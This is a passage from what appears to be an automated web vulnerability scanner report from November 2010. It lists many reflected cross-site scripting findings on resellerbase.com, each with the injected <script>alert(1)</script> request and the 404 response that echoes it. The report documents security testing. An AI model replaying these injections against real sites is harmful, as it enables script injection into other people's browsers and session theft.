<p>The requested URL /detail/16/themes14123<script>alert(1)</script>b51a5de0a70/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1318. http://www.resellerbase.com/detail/16/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8b336<script>alert(1)</script>cd6f1190caa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos8b336<script>alert(1)</script>cd6f1190caa/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos8b336<script>alert(1)</script>cd6f1190caa/ was not found on this server.</p>
...[SNIP]...

2.1319. http://www.resellerbase.com/detail/16/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e522c<script>alert(1)</script>bdae7d5156b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/?e522c<script>alert(1)</script>bdae7d5156b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/?e522c<script>alert(1)</script>bdae7d5156b=1 was not found on this server.</p>
...[SNIP]...

2.1320. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51950<script>alert(1)</script>90066cd51c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail51950<script>alert(1)</script>90066cd51c0/16/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail51950<script>alert(1)</script>90066cd51c0/16/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1321. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40cc7<script>alert(1)</script>66862264298 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1640cc7<script>alert(1)</script>66862264298/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1640cc7<script>alert(1)</script>66862264298/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1322. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0e4e<script>alert(1)</script>934b34ba44e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themesc0e4e<script>alert(1)</script>934b34ba44e/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themesc0e4e<script>alert(1)</script>934b34ba44e/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1323. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ef44<script>alert(1)</script>92de2721c98 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos3ef44<script>alert(1)</script>92de2721c98/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos3ef44<script>alert(1)</script>92de2721c98/images/ was not found on this server.</p>
...[SNIP]...

2.1324. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ffd38<script>alert(1)</script>7f81ba0d753 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/imagesffd38<script>alert(1)</script>7f81ba0d753/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/imagesffd38<script>alert(1)</script>7f81ba0d753/ was not found on this server.</p>
...[SNIP]...

2.1325. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 99284<script>alert(1)</script>8ad597ac3a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/?99284<script>alert(1)</script>8ad597ac3a0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/?99284<script>alert(1)</script>8ad597ac3a0=1 was not found on this server.</p>
...[SNIP]...

2.1326. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 306d5<script>alert(1)</script>f6a957e88d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail306d5<script>alert(1)</script>f6a957e88d6/16/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail306d5<script>alert(1)</script>f6a957e88d6/16/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1327. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92c2b<script>alert(1)</script>3871f34179a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1692c2b<script>alert(1)</script>3871f34179a/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1692c2b<script>alert(1)</script>3871f34179a/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1328. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3b4f2<script>alert(1)</script>2e2482eca5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes3b4f2<script>alert(1)</script>2e2482eca5e/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes3b4f2<script>alert(1)</script>2e2482eca5e/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1329. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9dc24<script>alert(1)</script>116e9cbcfef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos9dc24<script>alert(1)</script>116e9cbcfef/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos9dc24<script>alert(1)</script>116e9cbcfef/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1330. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5056<script>alert(1)</script>0c7a695303d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/imagesb5056<script>alert(1)</script>0c7a695303d/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/imagesb5056<script>alert(1)</script>0c7a695303d/rating/ was not found on this server.</p>
...[SNIP]...

2.1331. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b89bc<script>alert(1)</script>20e72ba475c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/ratingb89bc<script>alert(1)</script>20e72ba475c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/ratingb89bc<script>alert(1)</script>20e72ba475c/ was not found on this server.</p>
...[SNIP]...

2.1332. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0a36<script>alert(1)</script>19a96630b56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/?e0a36<script>alert(1)</script>19a96630b56=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/?e0a36<script>alert(1)</script>19a96630b56=1 was not found on this server.</p>
...[SNIP]...

2.1333. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0a60<script>alert(1)</script>be15ccf100c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila0a60<script>alert(1)</script>be15ccf100c/16/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila0a60<script>alert(1)</script>be15ccf100c/16/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1334. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd0cd<script>alert(1)</script>48c0dc70cac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16fd0cd<script>alert(1)</script>48c0dc70cac/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16fd0cd<script>alert(1)</script>48c0dc70cac/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1335. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3892<script>alert(1)</script>c80695c1187 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themesb3892<script>alert(1)</script>c80695c1187/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themesb3892<script>alert(1)</script>c80695c1187/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1336. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e590b<script>alert(1)</script>8535759e12d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmose590b<script>alert(1)</script>8535759e12d/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmose590b<script>alert(1)</script>8535759e12d/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1337. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ace84<script>alert(1)</script>bb8b883514b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/imagesace84<script>alert(1)</script>bb8b883514b/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
